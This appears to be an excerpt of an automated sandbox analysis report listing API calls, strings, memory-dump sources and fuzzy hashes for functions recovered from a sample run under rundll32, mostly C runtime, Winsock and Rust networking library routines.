                              • GetCurrentThreadId.KERNEL32 ref: 04DBF95E
                              • __freefls@4.LIBCMT ref: 04DBF97E
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 2383549826-0
                              • Opcode ID: 9957925bf0d2a80f46a25137a174bd6527d752b1b17a4b9baec280f5000d3392
                              • Instruction ID: a16f0eb3ffa427c79ec7c603b0ec2c37dca7dccc9cf024e9dfc69b64f4bf4b29
                              • Opcode Fuzzy Hash: 9957925bf0d2a80f46a25137a174bd6527d752b1b17a4b9baec280f5000d3392
                              • Instruction Fuzzy Hash: 8AF01D74601202FBEB18BFB1CA4888E7BA9EF49248710C65CE98587211DA35F952DBF5
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0420737C
                                • Part of subcall function 04209878: TlsGetValue.KERNEL32(7FFFFFFF,042099D1,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?), ref: 04209881
                                • Part of subcall function 04209878: DecodePointer.KERNEL32(?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000,0000000A), ref: 04209893
                                • Part of subcall function 04209878: TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,0420AF67,?,?,AC6D425D,00000000,?,0420772F,?,00000000), ref: 042098A2
                              • ___fls_getvalue@4.LIBCMT ref: 04207387
                                • Part of subcall function 04209858: TlsGetValue.KERNEL32(?,?,0420738C,00000000), ref: 04209866
                              • ___fls_setvalue@8.LIBCMT ref: 0420739A
                                • Part of subcall function 042098AC: DecodePointer.KERNEL32(?,?,?,0420739F,00000000,?,00000000), ref: 042098BD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 042073A3
                              • ExitThread.KERNEL32 ref: 042073AA
                              • GetCurrentThreadId.KERNEL32 ref: 042073B0
                              • __freefls@4.LIBCMT ref: 042073D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 2383549826-0
                              • Opcode ID: fba2fa4b594c316878a1adfa7560edcab40b9aea1bfbf9dd4184a751d6ba9434
                              • Instruction ID: a2cb7e87270287015d30bf367eb7dd3a66234914133e5758d2b5d3e3d2e8eaf9
                              • Opcode Fuzzy Hash: fba2fa4b594c316878a1adfa7560edcab40b9aea1bfbf9dd4184a751d6ba9434
                              • Instruction Fuzzy Hash: 90F036B4720604ABE714BF75D54884EBBE9EFC8248310C464ED0687353DB39FC828BA1
                              APIs
                              • memmove.VCRUNTIME140(?,reqwest-internal-sync-runtimecore thread exited early,0000001D), ref: 6CBC1681
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: */*$reqwest-internal-sync-runtimecore thread exited early$QK$\
                              • API String ID: 2162964266-2385550814
                              • Opcode ID: 6549ecb62e3f9a4782e5d0da49724cffe84350070bd36681948f7f4f2050ec9c
                              • Instruction ID: 01502a12f8d63ca2561a8aa0ac14c4d78920cbc0c27ab999bbd764e8870103da
                              • Opcode Fuzzy Hash: 6549ecb62e3f9a4782e5d0da49724cffe84350070bd36681948f7f4f2050ec9c
                              • Instruction Fuzzy Hash: 9E525A716087858FD325CF24C444BEAB7F0FF89315F058AAEE98D9B252EB709485CB52
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 042032F1
                              • Sleep.KERNEL32(00000258), ref: 042032FE
                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04203306
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04203312
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0420331A
                              • Sleep.KERNEL32(0000012C), ref: 0420332B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                              • String ID:
                              • API String ID: 3137405945-0
                              • Opcode ID: 013dece53a6a5f29b4c5b463b69867e49fd7541af16ef335c69ea4f233f8317a
                              • Instruction ID: c1601265802bc13eb5b97468f8356e1838fdd2c6e0d61fe82e1df6878a2707cb
                              • Opcode Fuzzy Hash: 013dece53a6a5f29b4c5b463b69867e49fd7541af16ef335c69ea4f233f8317a
                              • Instruction Fuzzy Hash: 69F054712043146FD6109BADDC84D46B3A8EF99330B104709B221872D0CEB4E8018BA0
                              APIs
                              • _malloc.LIBCMT ref: 04DBF681
                                • Part of subcall function 04DBF5D3: __FF_MSGBANNER.LIBCMT ref: 04DBF5EC
                                • Part of subcall function 04DBF5D3: __NMSG_WRITE.LIBCMT ref: 04DBF5F3
                                • Part of subcall function 04DBF5D3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04DC44E0,00000000,00000001,00000000,?,04DC8DE6,00000018,04DD6448,0000000C,04DC8E76), ref: 04DBF618
                              • std::exception::exception.LIBCMT ref: 04DBF6B6
                              • std::exception::exception.LIBCMT ref: 04DBF6D0
                              • __CxxThrowException@8.LIBCMT ref: 04DBF6E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: bad allocation
                              • API String ID: 615853336-2104205924
                              • Opcode ID: aab201280f05becde2bc153f9fc57abfb30ef3b0efbd5f186eeab2c53253321f
                              • Instruction ID: 4057a50c351edfdce5e89d675a513db37d1b9803fe78497e47e35c7682e6ee8b
                              • Opcode Fuzzy Hash: aab201280f05becde2bc153f9fc57abfb30ef3b0efbd5f186eeab2c53253321f
                              • Instruction Fuzzy Hash: 6CF0D171A00209EAEB10EB55CC24AEF3BB9EF00318F04005DD882D2290DBB4FA058BE4
                              APIs
                              • _malloc.LIBCMT ref: 042070F1
                                • Part of subcall function 04207043: __FF_MSGBANNER.LIBCMT ref: 0420705C
                                • Part of subcall function 04207043: __NMSG_WRITE.LIBCMT ref: 04207063
                                • Part of subcall function 04207043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0420A0B0,?,00000001,?,?,0420C10B,00000018,04217C70,0000000C,0420C19B), ref: 04207088
                              • std::exception::exception.LIBCMT ref: 04207126
                              • std::exception::exception.LIBCMT ref: 04207140
                              • __CxxThrowException@8.LIBCMT ref: 04207151
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: bad allocation
                              • API String ID: 615853336-2104205924
                              • Opcode ID: cd4ebc629b893fe34e93f74a1f95e79df27b9aaa9394053ac3790bd3fd80a9d0
                              • Instruction ID: 633a6d0cddc924308265399f79d965cd385eaa0296d26268169be8820db3c977
                              • Opcode Fuzzy Hash: cd4ebc629b893fe34e93f74a1f95e79df27b9aaa9394053ac3790bd3fd80a9d0
                              • Instruction Fuzzy Hash: A7F0A93173010E6BEB15ABA4DC44E5D7BE69BE1618F108015E404960E1DFB0FB85C791
                              APIs
                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 04202D3C
                              • CancelIo.KERNEL32(?), ref: 04202D46
                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 04202D4F
                              • closesocket.WS2_32(?), ref: 04202D59
                              • SetEvent.KERNEL32(00000001), ref: 04202D63
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                              • String ID:
                              • API String ID: 1486965892-0
                              • Opcode ID: d4421ab24fb5a5b6c6ece570ade8b520a91f6227870ba5fea325cee57ca639b2
                              • Instruction ID: 34776c5b82fa2321ae21a8ddfd518f5d4b3a7f99fe612ced480b1a0d8212d370
                              • Opcode Fuzzy Hash: d4421ab24fb5a5b6c6ece570ade8b520a91f6227870ba5fea325cee57ca639b2
                              • Instruction Fuzzy Hash: B5F03C76200700BBD3209F98EC4DB5677B8FB89B11F104699F68297690CAB4B9448BE0
                              APIs
                                • Part of subcall function 6CBF58F1: memmove.VCRUNTIME140(?,00000000,00000000,00000000,00000000,?,00000020,?,6CC2F033,stream closed because of a broken pipesend_close: unexpected state ,00000026), ref: 6CBF5916
                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 6CC584BE
                              • WSAGetLastError.WS2_32(?,00000004,?,?,00000002,6CC0288D,?,?,6CCB5F8C,6CCB5F64), ref: 6CC584CB
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC583C2, 6CC5847D
                              • A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s, xrefs: 6CC57F5F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastmemmovesetsockopt
                              • String ID: A Tokio 1.x context was found, but it is being shutdown.the timer is shutdown, must be called from the context of Tokio runtimetimer is at capacity and cannot create a new entrytimer duration exceeds maximum durationdeadline has elapsedD:\rust\cargo\registry\s$called `Result::unwrap()` on an `Err` value
                              • API String ID: 1441254279-3286110522
                              • Opcode ID: 79790b70de6aa19326fe846280581a06ced08451e058eb014dc20e4838e6d6c4
                              • Instruction ID: 3124441ed55809479c73672667a23278cc4b8ae2d02a4052fa1a658e2cf8684c
                              • Opcode Fuzzy Hash: 79790b70de6aa19326fe846280581a06ced08451e058eb014dc20e4838e6d6c4
                              • Instruction Fuzzy Hash: 4602C0B06587408FD314CF25C480B5ABBF0BF89318F50892EE9998B791EB74D869CF46
                              APIs
                              • recv.WS2_32(?,?,?,00000000), ref: 6CC58593
                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CC585A0
                              Strings
                              • filled overflowfilled must not become larger than initialized, xrefs: 6CC58700
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastrecv
                              • String ID: filled overflowfilled must not become larger than initialized
                              • API String ID: 2514157807-3814584485
                              • Opcode ID: cd834f0718c1be4b623b1a102edfde7bcacbd515e423b00628137acfb57050e9
                              • Instruction ID: 281ff3ad627dd0a5ec5a9d58af8690c41f6c6edc3078f3315d8b6eb3a682202b
                              • Opcode Fuzzy Hash: cd834f0718c1be4b623b1a102edfde7bcacbd515e423b00628137acfb57050e9
                              • Instruction Fuzzy Hash: BF618DB05593409FD700CF15C580A1AFBE1BF88314F948A5EF5988B790EB71D869CB8A
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC100B6
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC100D9
                              • memmove.VCRUNTIME140(?,?,00000158), ref: 6CC10198
                              • memmove.VCRUNTIME140(?,?,000001B0), ref: 6CC101BB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: 4031d680bf5d71de12617f3313b9a805d4526c04c56a0840d3d2cecbafeb855a
                              • Instruction ID: 4fe49241b3e7cbb9ea35226c8907d33eeef80d990e2d8436174b1ddb1696454e
                              • Opcode Fuzzy Hash: 4031d680bf5d71de12617f3313b9a805d4526c04c56a0840d3d2cecbafeb855a
                              • Instruction Fuzzy Hash: 7A51173164C384DFCB01DB65C850AEEBBE5BF95354F088859E8C94BB41E730D869D792
                              APIs
                                • Part of subcall function 6CBEB679: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000081), ref: 6CBEB6BC
                                • Part of subcall function 6CBEB679: ioctlsocket.WS2_32(?,8004667E,?), ref: 6CBEB6DA
                                • Part of subcall function 6CBEB679: closesocket.WS2_32(?), ref: 6CBEB9F0
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Strings
                              • cannot poll Select twice, xrefs: 6CC020FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$Socketclosesocketioctlsocket
                              • String ID: cannot poll Select twice
                              • API String ID: 3048605929-3773267893
                              • Opcode ID: 88eab26839bc5982d738a903d031c578eac12291280153d7fa582554f5831f7c
                              • Instruction ID: 0e19070b46a5a1de58175b201fb9e4776c26bdf92a50f5e21c031c39e0596d9e
                              • Opcode Fuzzy Hash: 88eab26839bc5982d738a903d031c578eac12291280153d7fa582554f5831f7c
                              • Instruction Fuzzy Hash: 1041BD31A08B44CBC751CF69C4909ABB7F1FF9A354F10895EE8992F611EB31E485CB92
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 04DB316B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04DB3183
                              • GetCurrentThreadId.KERNEL32 ref: 04DB322F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread$ExchangeInterlocked
                              • String ID:
                              • API String ID: 4033114805-0
                              • Opcode ID: 48991f1146cabb514189fb7839d4c4e252bea761e71b0e312975d77e65472408
                              • Instruction ID: 2b2aa7022b78811a3bdbf9b50d0b4c818dd0b68b3d161b44d6f993dc0cf45adc
                              • Opcode Fuzzy Hash: 48991f1146cabb514189fb7839d4c4e252bea761e71b0e312975d77e65472408
                              • Instruction Fuzzy Hash: B7313671200602DFD718DF69C994AAAB3E9FF44748B10C52DE89B8B715E731F841DB90
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 0420314B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04203163
                              • GetCurrentThreadId.KERNEL32 ref: 0420320F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread$ExchangeInterlocked
                              • String ID:
                              • API String ID: 4033114805-0
                              • Opcode ID: 88f87101ce69337421600af4abb42716e1b11e699cf57e886a06ef23dbb3e8dd
                              • Instruction ID: ce23757db7fd66b44d275e5b2b128d3b3c2cc4f7fddac5f228ea9f71bf28340f
                              • Opcode Fuzzy Hash: 88f87101ce69337421600af4abb42716e1b11e699cf57e886a06ef23dbb3e8dd
                              • Instruction Fuzzy Hash: BE316D70320606AFD718DF69C884A6AF7E5FF48718B10C52DE81ACB696D771F851CB90
                              APIs
                              • memmove.VCRUNTIME140(?,?,?), ref: 6CC4F485
                              • getaddrinfo.WS2_32(?,00000000,?,?), ref: 6CC4F4F0
                              • WSAGetLastError.WS2_32 ref: 6CC4F4FD
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastgetaddrinfomemmove
                              • String ID:
                              • API String ID: 1338285005-0
                              • Opcode ID: 006f3ca19f2a41b0710ff26df313ff6b9a3a3e442b3e74593f9fdf8403a4e4b1
                              • Instruction ID: a8346b0f7e5f82f72a80d1bbd949c71d808175c130ed76185d59fa045a4cb1d6
                              • Opcode Fuzzy Hash: 006f3ca19f2a41b0710ff26df313ff6b9a3a3e442b3e74593f9fdf8403a4e4b1
                              • Instruction Fuzzy Hash: A9316CB1E002099FDB10CF95D980BEEBBB4FF45314F14C569E889A7740E774A985CBA1
                              APIs
                              • InterlockedDecrement.KERNEL32(00000008), ref: 04DB530C
                              • SysFreeString.OLEAUT32(00000000), ref: 04DB5321
                              • SysAllocString.OLEAUT32(04DD5148), ref: 04DB5372
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: String$AllocDecrementFreeInterlocked
                              • String ID:
                              • API String ID: 3605875487-0
                              • Opcode ID: 21635bb4bdc66154c805e526087790a04675ef61b3f5c0bc2f2fce173df8341b
                              • Instruction ID: ae681b9babe87a4a95798c9e7225a5be5c767c35489b810e1c09a31688a1593b
                              • Opcode Fuzzy Hash: 21635bb4bdc66154c805e526087790a04675ef61b3f5c0bc2f2fce173df8341b
                              • Instruction Fuzzy Hash: FD318F71A01755EBEB209FA4D890B9A77A8FF04B18F444669EC96DB340D7B5F900CBD0
                              APIs
                              • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,00000004,000000FF), ref: 6CC649D7
                              • GetLastError.KERNEL32 ref: 6CC649DE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressErrorLastWait
                              • String ID:
                              • API String ID: 1574541344-0
                              • Opcode ID: 6bc4fa9642e8203db52c6f44d8c8b135ab49e7556db700e6fdadd364c5fa277f
                              • Instruction ID: abcff6106ee36c7415d504522304ba7603a872fbcf1080bbb6fb62de4d288067
                              • Opcode Fuzzy Hash: 6bc4fa9642e8203db52c6f44d8c8b135ab49e7556db700e6fdadd364c5fa277f
                              • Instruction Fuzzy Hash: 1E21F071A4021A9FDF05CF56C9E07AD7BB1FB86318F144128E102BBF40E7389842CB54
                              APIs
                              • __floor_pentium4.LIBCMT ref: 04DB11E9
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DB1226
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DB1255
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 467471f3b21175756d949a039a2048d644e77935162841952bed21ccd6597b8e
                              • Instruction ID: 867be1d37922cd65f896854478702786b2f7c261c9af600fc6979c6ef64ad0cd
                              • Opcode Fuzzy Hash: 467471f3b21175756d949a039a2048d644e77935162841952bed21ccd6597b8e
                              • Instruction Fuzzy Hash: 86219271B00709EFDB149FA9E855BAEBBF4FF40745F0085ADE88AD2640EA30B8108754
                              APIs
                              • __floor_pentium4.LIBCMT ref: 042011E9
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04201226
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04201255
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 6503f2d9b2a37e47294090aeef3f8ac1f52b14b21d70e06afffed11013794ef0
                              • Instruction ID: 71100dc4e6fb5630e545d3b5cb0b1e38d973854c76ef305c7fe1df32efd0172f
                              • Opcode Fuzzy Hash: 6503f2d9b2a37e47294090aeef3f8ac1f52b14b21d70e06afffed11013794ef0
                              • Instruction Fuzzy Hash: BB21C271B10209AFDB149FADE985B6EF7F4EF84705F00C5A9E849D3681EA31B8508740
                              APIs
                              • __floor_pentium4.LIBCMT ref: 04DB112F
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04DB115F
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04DB1192
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: 2b2a30ec812d41eba3aa7e98bbb5c7b79acd44f28e5340304c06720157bd7d85
                              • Instruction ID: d6eed520a2a9d8ae876fc77db7fa6565b4bf6c70bfa3340701dab92148ca2310
                              • Opcode Fuzzy Hash: 2b2a30ec812d41eba3aa7e98bbb5c7b79acd44f28e5340304c06720157bd7d85
                              • Instruction Fuzzy Hash: F7119370A00709EFDB109FA9DC95B6EFBF8FF04785F1085A9E99AE2340E674A9108754
                              APIs
                              • __floor_pentium4.LIBCMT ref: 0420112F
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0420115F
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04201192
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                               • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree__floor_pentium4
                              • String ID:
                              • API String ID: 2605973128-0
                              • Opcode ID: f8093aaef2773a4b5cec0e9cab6c0a1505d64c174b481dd90ce5d5cd269a51b1
                              • Instruction ID: daec0243587e34aa40de75fc20f96ed6cae628394af91b9d066d47db1d8f4566
                              • Opcode Fuzzy Hash: f8093aaef2773a4b5cec0e9cab6c0a1505d64c174b481dd90ce5d5cd269a51b1
                              • Instruction Fuzzy Hash: F911D370B10309AFEB149FA9D886B6EFBF8FF44705F0084A9ED59D3281E675A850C750
                              APIs
                              • RtlReAllocateHeap.NTDLL(00000000,?,6CC48F66,?,?,?,?,?,6CC48F66,?,?,?,?,?), ref: 6CBC5B0E
                              • memmove.VCRUNTIME140(00000000,?,6CC48F66,?,?,?,?,?,6CC48F66,?,?,?,?,?), ref: 6CBC5B44
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6CC48D0C,?,?,?,00000077), ref: 6CBC5B57
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
